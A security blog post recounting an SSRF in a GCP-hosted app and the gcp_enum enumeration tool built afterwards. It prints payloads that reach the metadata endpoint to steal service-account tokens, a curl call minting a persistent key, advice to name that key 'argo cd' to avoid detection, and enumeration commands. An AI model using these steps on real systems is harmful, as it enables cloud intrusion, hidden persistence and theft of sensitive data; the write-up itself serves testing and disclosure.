From an SSRF to the creation of gcp_enum

Written by Bruno Menna

In this article, we will discuss a case of SSRF in a GCP environment and how exploiting this vulnerability led to the idea and creation of the tool gcp_enum.

The tool automates the process of authenticating GCP service accounts and provides a convenient way to list various GCP resources.

Backstory

During a code review, the team found a possible SSRF; the application used the BFF (Backend for Frontend) architecture.

Backend for Frontend (BFF) is a design pattern where separate backend services are created specifically for each frontend client. This allows developers to tailor backend logic and data retrieval to the needs of each frontend, improving performance and user experience.

The application was built with Axios, and the vulnerable snippet passed user-controlled input straight into the outgoing request.
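A minimal sketch of the pattern, assuming an Express-based BFF endpoint that forwards the user-supplied content object as the entire Axios request config (the route path, handler, and field names are illustrative, not the client's actual code):

import express from "express";
import axios from "axios";

const app = express();
app.use(express.json());

// Hypothetical BFF proxy endpoint: the user-supplied "content" object is
// forwarded directly as the Axios request config, so the caller controls
// the target URL (and, as we found later, the request headers too).
app.post("/api/content", async (req, res) => {
  const options = req.body.content; // attacker-controlled request config
  const response = await axios(options);
  res.json(response.data);
});

app.listen(3000);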

The “content” parameter was passed into the outgoing request and could be supplied by users. We also knew that the client used GCP as its cloud provider, so the first idea was to send a request to the internal metadata endpoint.
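Assuming the hypothetical endpoint sketched above, the first probe would have looked something like this (the JSON shape is an assumption; the metadata URL is GCP's standard internal endpoint):

{
  "content": {
    "url": "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
  }
}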

We sent this request and the response was a 403 error.

After some research, we found that a “Metadata-Flavor: Google” header is required for internal metadata requests.

At this point we also had to find a way to send this header, or we wouldn’t be able to exploit the SSRF.

Reading the Axios docs, we discovered that attaching headers to requests is possible (the request config accepts a headers object), which would solve our problem.

This was the request that we sent with the header attached, and it was successful.
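Again assuming the sketched endpoint, the successful payload would have been along these lines (the JSON shape is illustrative; the URL and header are GCP's standard ones):

{
  "content": {
    "url": "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token",
    "headers": { "Metadata-Flavor": "Google" }
  }
}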

From that point on, we were able to generate access tokens for the service account.
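The token endpoint returns GCP's standard short-lived OAuth2 response (token value elided):

{
  "access_token": "ya29....",
  "expires_in": 3599,
  "token_type": "Bearer"
}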

The only problem was that this token was short-lived: it was valid for about an hour, and each time it expired we had to generate a new one and share it with the team.

Considering this, we created an access key for the service account, simplifying authentication via the GCP CLI. We carefully chose a non-suspicious name, “argo cd,” in line with the company’s naming conventions to avoid detection. Because the name is associated with Kubernetes deployments, such a key is generally left alone due to the risk of breaking something by removing it.
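One way to mint such a key with nothing but the stolen access token is the standard IAM projects.serviceAccounts.keys.create API (the placeholder values are illustrative); the response carries the key file base64-encoded in its privateKeyData field:

curl -s -X POST \
  -H "Authorization: Bearer <access_token>" \
  -H "Content-Type: application/json" \
  -d '{}' \
  "https://iam.googleapis.com/v1/projects/-/serviceAccounts/<service_account_email>/keys"

This sketch assumes the compromised service account holds the iam.serviceAccountKeys.create permission on itself.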

After creating the key, we paused for a few hours before using it. Once authenticated with the key file, we could use the `gcloud` and `gsutil` commands directly. We listed the buckets with `gcloud storage ls` and got access to many sensitive files, including production backup files and payment information.
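Authenticating with the key file and listing the buckets takes two standard commands:

gcloud auth activate-service-account --key-file=<path_to_json_key_file>
gcloud storage ls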

We started testing access to other resources, but it was all manual: for each resource, we had to send a separate request.

That’s when the idea of creating a tool to automate this process came to life.

GCP_ENUM

Usage

To authenticate GCP service accounts and test resource access, there are two methods:

  1. Using a key file
  2. Listing the already logged-in accounts and choosing one to test

To use a JSON key file, run:

python3 gcp_enum.py -f <path_to_json_key_file> -o <output_file>

To list the already logged-in accounts:

python3 gcp_enum.py -l

If there are logged-in accounts, copy the email address of the one you want to test and pass it to the command:

python3 gcp_enum.py -s <service_account_email> -o <output_file>

You will get an overview of the permissions the account has. For more detail, check the output file, which contains the full output of every service you have access to.

The tool is also modular: if a test is missing, you can add it by supplying a name and the corresponding command, as in the snippet below.

Example snippet from the code:


resource_commands = {
    "AI Platform Jobs": "gcloud ai-platform jobs list",
    "AI Platform Models": "gcloud ai-platform models list",
    "BigQuery": "bq ls",
    "Cloud Bigtable Instances": "gcloud bigtable instances list",
    "Cloud Filestore Instances": "gcloud filestore instances list",
    "Cloud Functions": "gcloud functions list",
    # ... (remaining entries omitted)
}

Conclusion

The exploration of a Server-Side Request Forgery (SSRF) vulnerability within a Google Cloud Platform (GCP) environment led to the development of gcp_enum, a tool that streamlines GCP service account authentication and resource listing. Born from the need to automate repetitive manual testing and token management, it offers a modular and efficient approach to understanding a service account's permissions and the landscape of accessible GCP resources.

The link to the tool is: https://github.com/hakaioffsec/gcp_enum.
